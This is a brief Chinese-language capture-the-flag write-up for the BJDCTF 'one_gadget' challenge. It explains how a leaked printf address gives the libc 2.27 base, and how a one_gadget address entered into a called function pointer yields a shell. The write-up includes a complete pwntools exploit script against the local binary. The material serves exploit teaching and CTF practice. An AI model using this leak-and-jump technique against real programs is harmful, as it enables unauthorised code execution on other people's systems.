BJDCTF_ one_gadget

考察点：one_gadget

题目给出了 printf 的地址，由此可算得 libc 基址，然后找 one_gadget、计算 libc 中 one_gadget 地址

printf("Give me your one gadget:");
__isoc99_scanf("%ld", &v4);
v5 = v4;
v4();

v4 是个函数指针，scanf 的时候把 one_gadget 转成十进制输入即可 getshell。

得倒prinf函数实际地址

0x7f551a4ebe80

寻找对应的libc版本

由于是本地所以其实是知道版本的就是2.27

确定one_gadget

最后写exp

from pwn import *

p = process('./one_gadget')
libc=ELF('./libc-2.27.so')

one_gadget = 0x10a38c
# elf, libc
printf_libc = libc.symbols['printf']

p.recvuntil('here is the gift for u:')
printf = int(p.recv(14),16)

libc_base = printf-printf_libc
print printf
p.recvuntil('gadget:')
p.sendline(str(one_gadget+libc_base))

p.interactive()